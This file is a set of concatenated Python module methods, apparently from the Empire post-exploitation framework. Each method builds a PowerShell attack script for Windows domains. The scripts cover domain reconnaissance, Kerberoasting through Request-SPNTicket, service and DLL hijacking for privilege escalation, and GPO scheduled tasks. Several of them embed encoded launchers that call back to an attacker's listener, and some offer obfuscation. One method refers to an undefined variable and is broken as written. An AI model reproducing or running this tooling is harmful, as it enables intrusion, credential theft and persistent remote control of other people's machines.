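def generate(self, obfuscate=False, obfuscationCommand=""):
    """Build the PowerShell script for this module.

    Reads the shared PowerView source from the install path, extracts only
    the function named by ``self.info["Name"]``, and appends an invocation
    of that function with every configured option except ``Agent`` passed
    as a parameter (a value of ``"true"`` becomes a bare switch; any other
    value is interpolated unquoted). The output is piped through
    ``Out-String`` and followed by a completion banner.

    Args:
        obfuscate: when true, the finished script is run through
            ``helpers.obfuscate``.
        obfuscationCommand: forwarded unchanged to ``helpers.obfuscate``.

    Returns:
        The script text, or ``""`` if the module source cannot be read.
    """
    moduleName = self.info["Name"]
    # read in the common powerview.ps1 module source code
    moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
    try:
        # ``with`` closes the handle even if read() raises; catching IOError
        # (OSError on Python 3) replaces a bare except that also swallowed
        # KeyboardInterrupt/SystemExit.
        with open(moduleSource, 'r') as f:
            moduleCode = f.read()
    except IOError:
        print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
        return ""

    # get just the code needed for the specified function
    script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
    script += moduleName + " "

    for option, values in self.options.items():
        if option.lower() == "agent":
            continue
        value = values['Value']
        if not value:
            continue
        if value.lower() == "true":
            # a "true" value means the option is a switch parameter
            script += " -" + str(option)
        else:
            script += " -" + str(option) + " " + str(value)

    script += ' | Out-String | %{$_ + "`n"};"`n' + str(moduleName) + ' completed!"'

    if obfuscate:
        script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
    return script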
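def generate(self):
    """Build the PowerShell script for this module.

    Reads the shared PowerUp source from the install path, extracts only
    the function named by ``self.info["Name"]``, and appends an invocation
    of that function with every configured option except ``Agent`` passed
    as a parameter (a value of ``"true"`` becomes a bare switch; any other
    value is interpolated unquoted). Unlike sibling modules, no
    ``Out-String`` pipeline or completion banner is appended.

    Returns:
        The script text, or ``""`` if the module source cannot be read.
    """
    moduleName = self.info["Name"]
    # read in the common powerup.ps1 module source code
    moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1"
    try:
        # ``with`` closes the handle even if read() raises; catching IOError
        # (OSError on Python 3) replaces a bare except that also swallowed
        # KeyboardInterrupt/SystemExit.
        with open(moduleSource, 'r') as f:
            moduleCode = f.read()
    except IOError:
        print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
        return ""

    # get just the code needed for the specified function
    script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
    script += moduleName + " "

    for option, values in self.options.items():
        if option.lower() == "agent":
            continue
        value = values['Value']
        if not value:
            continue
        if value.lower() == "true":
            # a "true" value means the option is a switch parameter
            script += " -" + str(option)
        else:
            script += " -" + str(option) + " " + str(value)

    return script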
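def generate(self):
    """Build the PowerShell script for this module.

    Reads the shared PowerView source from the install path, extracts only
    the function named by ``self.info["Name"]``, and appends an invocation
    of that function with every configured option except ``Agent`` passed
    as a parameter (a value of ``"true"`` becomes a bare switch; any other
    value is interpolated unquoted). The output is converted with
    ``ConvertTo-Csv``, piped through ``Out-String`` and followed by a
    completion banner.

    Returns:
        The script text, or ``""`` if the module source cannot be read.
    """
    moduleName = self.info["Name"]
    # read in the common powerview.ps1 module source code
    moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
    try:
        # ``with`` closes the handle even if read() raises; catching IOError
        # (OSError on Python 3) replaces a bare except that also swallowed
        # KeyboardInterrupt/SystemExit.
        with open(moduleSource, "r") as f:
            moduleCode = f.read()
    except IOError:
        print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
        return ""

    # get just the code needed for the specified function
    script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
    script += moduleName + " "

    for option, values in self.options.items():
        if option.lower() == "agent":
            continue
        value = values["Value"]
        if not value:
            continue
        if value.lower() == "true":
            # a "true" value means the option is a switch parameter
            script += " -" + str(option)
        else:
            script += " -" + str(option) + " " + str(value)

    # note: no leading space before the pipe, exactly as the module emits it
    script += (
        '| ConvertTo-Csv -NoTypeInformation | Out-String | %{$_ + "`n"};"`n'
        + str(moduleName)
        + ' completed!"'
    )
    return script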
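def generate(self):
    """Build the PowerShell script for this module.

    Validates the ``Listener`` option, asks the stager manager for an
    encoded launcher one-liner for that listener, then extracts the
    function named by ``self.info["Name"]`` from the shared PowerView
    source and invokes it with ``-Command cmd -CommandArguments
    '/c "<launcher>"' -Force``. Only the task/GPO/domain options listed in
    ``passthrough`` are forwarded; their values are wrapped in single
    quotes (a value of ``"true"`` becomes a bare switch). The output is
    piped through ``Out-String`` and followed by a completion banner.

    Returns:
        The script text, or ``""`` if the listener is invalid, the launcher
        could not be generated, or the module source cannot be read.
    """
    moduleName = self.info["Name"]
    listenerName = self.options['Listener']['Value']
    userAgent = self.options['UserAgent']['Value']
    proxy = self.options['Proxy']['Value']
    proxyCreds = self.options['ProxyCreds']['Value']

    if not self.mainMenu.listeners.is_listener_valid(listenerName):
        # not a valid listener, return nothing for the script
        print(helpers.color("[!] Invalid listener: " + listenerName))
        return ""

    # generate the PowerShell one-liner with all of the proper options set
    launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
    # The previous check compared the wrapped command with "" after the
    # '/c "' prefix had been added, so it could never trigger; test the
    # launcher itself so an empty launcher does not yield a runnable script.
    if not launcher:
        print(helpers.color("[!] Error in launcher command generation."))
        return ""
    command = '/c "' + launcher + '"'

    # read in the common powerview.ps1 module source code
    moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
    try:
        # ``with`` closes the handle even if read() raises; catching IOError
        # (OSError on Python 3) replaces a bare except that also swallowed
        # KeyboardInterrupt/SystemExit.
        with open(moduleSource, 'r') as f:
            moduleCode = f.read()
    except IOError:
        print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
        return ""

    # get just the code needed for the specified function
    script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
    script += moduleName + " -Command cmd -CommandArguments '" + command + "' -Force"

    # only these options are passed on to the module function
    passthrough = ("taskname", "taskdescription", "taskauthor", "gponame", "gpodisplayname", "domain", "domaincontroller")
    for option, values in self.options.items():
        if option.lower() not in passthrough:
            continue
        value = values['Value']
        if not value:
            continue
        if value.lower() == "true":
            # a "true" value means the option is a switch parameter
            script += " -" + str(option)
        else:
            script += " -" + str(option) + " '" + str(value) + "'"

    script += ' | Out-String | %{$_ + "`n"};"`n' + str(moduleName) + ' completed!"'
    return script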
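def generate(self, obfuscate=False, obfuscationCommand=""):
    """Build the PowerShell script for this module.

    Extracts the function named by ``self.info["Name"]`` from the shared
    PowerUp source, requires an Empire listener, configures the shared
    ``launcher_bat`` stager in place and generates its batch launcher, then
    emits PowerShell that writes that launcher to ``$env:temp\\debug.bat``
    and calls ``Invoke-ServiceCMD`` against ``ServiceName`` with a
    ``cmd.exe /C`` command that runs the written file.

    Args:
        obfuscate: when true, the finished script is run through
            ``helpers.obfuscate``.
        obfuscationCommand: forwarded unchanged to ``helpers.obfuscate``.

    Returns:
        The script text, or ``""`` if the module source cannot be read, the
        listener is not an Empire listener, or launcher generation fails.
    """
    moduleName = self.info["Name"]
    # read in the common powerup.ps1 module source code
    moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1"
    try:
        # ``with`` closes the handle even if read() raises; catching IOError
        # (OSError on Python 3) replaces a bare except that also swallowed
        # KeyboardInterrupt/SystemExit.
        with open(moduleSource, 'r') as f:
            moduleCode = f.read()
    except IOError:
        print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
        return ""

    # get just the code needed for the specified function
    script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)

    # extract all of our options
    serviceName = self.options['ServiceName']['Value']
    listenerName = self.options['Listener']['Value']
    if not self.mainMenu.listeners.is_listener_empire(listenerName):
        print(helpers.color("[!] Empire listener required!"))
        return ""

    # The launcher_bat stager is a shared instance owned by mainMenu; its
    # options are overwritten here and stay that way after this call.
    l = self.mainMenu.stagers.stagers['launcher_bat']
    l.options['Listener']['Value'] = self.options['Listener']['Value']
    l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
    l.options['Proxy']['Value'] = self.options['Proxy']['Value']
    l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
    l.options['Delete']['Value'] = "True"
    launcherCode = l.generate()
    # bail before building the heredoc, not after (same result, less work)
    if launcherCode == "":
        print(helpers.color("[!] Error in launcher .bat generation."))
        return ""

    # PowerShell code to write the launcher.bat out; the launcher is embedded
    # verbatim inside a @"..."@ here-string
    script += '$tempLoc = "$env:temp\\debug.bat"'
    script += '\n$batCode = @"\n' + launcherCode + '"@\n'
    script += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n"
    script += '"Launcher bat written to $tempLoc `n";\n'

    script += 'Invoke-ServiceCMD -ServiceName "' + serviceName + '" -CMD "C:\\Windows\\System32\\cmd.exe /C `"$env:Temp\\debug.bat`""'

    if obfuscate:
        script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
    return script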
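def generate(self):
    """Build the PowerShell script for this module.

    Reads the shared PowerUp source, requires an Empire listener, extracts
    ``Write-ServiceEXECMD`` from the source, configures the shared
    ``launcher_bat`` stager in place (including its ``Delete`` option from
    this module's ``Delete`` option) and generates its batch launcher, then
    emits PowerShell that writes that launcher to ``$env:temp\\debug.bat``
    and calls ``Write-ServiceEXECMD`` against ``ServiceName`` with a
    ``cmd.exe /C $tempLoc`` command.

    Returns:
        The script text, or ``""`` if the module source cannot be read, the
        listener is not an Empire listener, or launcher generation fails.
    """
    # read in the common powerup.ps1 module source code
    moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1"
    try:
        # ``with`` closes the handle even if read() raises; catching IOError
        # (OSError on Python 3) replaces a bare except that also swallowed
        # KeyboardInterrupt/SystemExit.
        with open(moduleSource, "r") as f:
            moduleCode = f.read()
    except IOError:
        print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
        return ""

    serviceName = self.options["ServiceName"]["Value"]
    listenerName = self.options["Listener"]["Value"]
    if not self.mainMenu.listeners.is_listener_empire(listenerName):
        print(helpers.color("[!] Empire listener required!"))
        return ""

    # this module always invokes Write-ServiceEXECMD, not self.info["Name"]
    script = helpers.generate_dynamic_powershell_script(moduleCode, "Write-ServiceEXECMD")

    # The launcher_bat stager is a shared instance owned by mainMenu; its
    # options are overwritten here and stay that way after this call.
    l = self.mainMenu.stagers.stagers["launcher_bat"]
    l.options["Listener"]["Value"] = self.options["Listener"]["Value"]
    l.options["UserAgent"]["Value"] = self.options["UserAgent"]["Value"]
    l.options["Proxy"]["Value"] = self.options["Proxy"]["Value"]
    l.options["ProxyCreds"]["Value"] = self.options["ProxyCreds"]["Value"]
    # normalise the user-supplied flag to the literal "True"/"False" the
    # stager expects
    deleteFlag = self.options["Delete"]["Value"].lower() == "true"
    l.options["Delete"]["Value"] = "True" if deleteFlag else "False"
    launcherCode = l.generate()
    # bail before building the heredoc, not after (same result, less work)
    if launcherCode == "":
        print(helpers.color("[!] Error in launcher .bat generation."))
        return ""

    # PowerShell code to write the launcher.bat out; the launcher is embedded
    # verbatim inside a @"..."@ here-string
    script += '$tempLoc = "$env:temp\\debug.bat"'
    script += '\n$batCode = @"\n' + launcherCode + '"@\n'
    script += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n"
    script += '"Launcher bat written to $tempLoc `n";\n'

    script += (
        '\nWrite-ServiceEXECMD -ServiceName "'
        + serviceName
        + '" -CMD "C:\\Windows\\System32\\cmd.exe /C $tempLoc"'
    )
    return script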
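def generate(self):
    """Build the PowerShell script for this module.

    Extracts the function named by ``self.info["Name"]`` from the shared
    PowerUp source, requires an Empire listener, configures the shared
    ``launcher_bat`` stager in place and generates its batch launcher, then
    emits PowerShell that writes that launcher to ``$env:temp\\debug.bat``
    and calls ``Invoke-ServiceCMD`` against ``ServiceName`` with a
    ``cmd.exe /C`` command that runs the written file.

    Returns:
        The script text, or ``""`` if the module source cannot be read, the
        listener is not an Empire listener, or launcher generation fails.
    """
    moduleName = self.info["Name"]
    # read in the common powerup.ps1 module source code
    moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1"
    try:
        # ``with`` closes the handle even if read() raises; catching IOError
        # (OSError on Python 3) replaces a bare except that also swallowed
        # KeyboardInterrupt/SystemExit.
        with open(moduleSource, 'r') as f:
            moduleCode = f.read()
    except IOError:
        print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
        return ""

    # get just the code needed for the specified function
    script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)

    # extract all of our options
    serviceName = self.options['ServiceName']['Value']
    listenerName = self.options['Listener']['Value']
    if not self.mainMenu.listeners.is_listener_empire(listenerName):
        print(helpers.color("[!] Empire listener required!"))
        return ""

    # The launcher_bat stager is a shared instance owned by mainMenu; its
    # options are overwritten here and stay that way after this call.
    l = self.mainMenu.stagers.stagers['launcher_bat']
    l.options['Listener']['Value'] = self.options['Listener']['Value']
    l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
    l.options['Proxy']['Value'] = self.options['Proxy']['Value']
    l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
    l.options['Delete']['Value'] = "True"
    launcherCode = l.generate()
    # bail before building the heredoc, not after (same result, less work)
    if launcherCode == "":
        print(helpers.color("[!] Error in launcher .bat generation."))
        return ""

    # PowerShell code to write the launcher.bat out; the launcher is embedded
    # verbatim inside a @"..."@ here-string
    script += '$tempLoc = "$env:temp\\debug.bat"'
    script += '\n$batCode = @"\n' + launcherCode + '"@\n'
    script += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n"
    script += '"Launcher bat written to $tempLoc `n";\n'

    script += 'Invoke-ServiceCMD -ServiceName "' + serviceName + '" -CMD "C:\\Windows\\System32\\cmd.exe /C `"$env:Temp\\debug.bat`""'
    return script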
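def generate(self):
    """Build the PowerShell script for this module.

    Reads ``Write-HijackDll.ps1`` from the install path, extracts the
    function named by ``self.info["Name"]``, requires an Empire listener,
    generates an encoded launcher one-liner for it, and invokes the
    function with ``-Command "<launcher>"`` and ``-OutputFile <HijackPath>``,
    piping the result through ``Out-String`` followed by a completion
    banner.

    Returns:
        The script text, or ``""`` if the module source cannot be read, the
        listener is not an Empire listener, or launcher generation fails.
    """
    moduleName = self.info["Name"]
    # read in the common powerup.ps1 module source code
    moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/powerup/Write-HijackDll.ps1"
    try:
        # ``with`` closes the handle even if read() raises; catching IOError
        # (OSError on Python 3) replaces a bare except that also swallowed
        # KeyboardInterrupt/SystemExit.
        with open(moduleSource, 'r') as f:
            moduleCode = f.read()
    except IOError:
        print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
        return ""

    # get just the code needed for the specified function
    script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)

    # NOTE(review): ``hijackPath`` is not defined anywhere in this method, so
    # the next line raises NameError as written, and ``batPath`` is never
    # read afterwards. Left byte-for-byte pending confirmation of the
    # intended source (presumably the HijackPath option read below).
    batPath = "\\".join(hijackPath.split("\\")[0:-1]) + "\debug.bat"

    script += moduleName + " "

    # extract all of our options
    listenerName = self.options['Listener']['Value']
    userAgent = self.options['UserAgent']['Value']
    proxy = self.options['Proxy']['Value']
    proxyCreds = self.options['ProxyCreds']['Value']
    if not self.mainMenu.listeners.is_listener_empire(listenerName):
        print(helpers.color("[!] Empire listener required!"))
        return ""

    # generate the launcher code
    launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
    if launcher == "":
        print(helpers.color("[!] Error in launcher command generation."))
        return ""

    outFile = self.options['HijackPath']['Value']
    script += " -Command \"%s\"" % (launcher)
    script += " -OutputFile %s" % (outFile)
    script += ' | Out-String | %{$_ + "`n"};"`n' + str(moduleName) + ' completed!"'
    return script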
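def generate(self, obfuscate=False, obfuscationCommand=""):
    """Build the PowerShell script for this module.

    Extracts the function named by ``self.info["Name"]`` from the shared
    PowerView source and builds its parameter list from every option except
    ``Agent`` and ``ExpandObject`` (a value of ``"true"`` becomes a bare
    switch; other values are interpolated unquoted). When ``ExpandObject``
    is set, the call is wrapped as ``(<fn> <params>).'<ExpandObject>'`` so
    that one property of the result is expanded; otherwise the plain call
    is emitted with a hint about ``ExpandObject`` in the completion banner.
    Either way the output goes through ``fl | Out-String``.

    Args:
        obfuscate: when true, the finished script is run through
            ``helpers.obfuscate``.
        obfuscationCommand: forwarded unchanged to ``helpers.obfuscate``.

    Returns:
        The script text, or ``""`` if the module source cannot be read.
    """
    moduleName = self.info["Name"]
    # read in the common powerview.ps1 module source code
    moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
    try:
        # ``with`` closes the handle even if read() raises; catching IOError
        # (OSError on Python 3) replaces a bare except that also swallowed
        # KeyboardInterrupt/SystemExit.
        with open(moduleSource, 'r') as f:
            moduleCode = f.read()
    except IOError:
        print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
        return ""

    # get just the code needed for the specified function
    script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)

    pscript = ""
    expand = False
    value_to_expand = ""
    for option, values in self.options.items():
        key = option.lower()
        value = values['Value']
        if key == "expandobject":
            # ExpandObject is not a parameter; it selects a property of the
            # result (concatenated, not str()-wrapped, as before)
            if value:
                expand = True
                value_to_expand += value
            continue
        if key == "agent" or not value:
            continue
        if value.lower() == "true":
            # a "true" value means the option is a switch parameter
            pscript += " -" + str(option)
        else:
            pscript += " -" + str(option) + " " + str(value)

    # shared tail of both branches: format-list, stringify, banner prefix
    tail = ' | fl | Out-String | %{$_ + "`n"};"`n' + str(moduleName)
    if expand:
        script += "(" + moduleName + " " + pscript + ").'" + value_to_expand + "'" + tail + ' completed!"'
    else:
        script += moduleName + " " + pscript + tail + " completed! Use ExpandObject option to expand one of the objects above such as 'System Access'\""

    if obfuscate:
        script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
    return script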
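def generate(self):
    """Build the PowerShell script for this module.

    Reads the shared PowerView source, extracts both ``Get-NetUser`` and
    ``Request-SPNTicket`` (the module's options are not consulted), and
    appends the fixed pipeline ``Get-NetUser | Request-SPNTicket`` followed
    by ``Out-String`` and a completion banner naming ``self.info["Name"]``.

    Returns:
        The script text, or ``""`` if the module source cannot be read.
    """
    moduleName = self.info["Name"]
    # read in the common powerview.ps1 module source code
    moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
    try:
        # ``with`` closes the handle even if read() raises; catching IOError
        # (OSError on Python 3) replaces a bare except that also swallowed
        # KeyboardInterrupt/SystemExit.
        with open(moduleSource, 'r') as f:
            moduleCode = f.read()
    except IOError:
        print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
        return ""

    # two functions are needed here, so a list is passed instead of a name
    script = helpers.generate_dynamic_powershell_script(moduleCode, ["Get-NetUser", "Request-SPNTicket"])
    script += ' Get-NetUser | Request-SPNTicket | Out-String | %{$_ + "`n"};"`n' + str(moduleName) + ' completed!"'
    return script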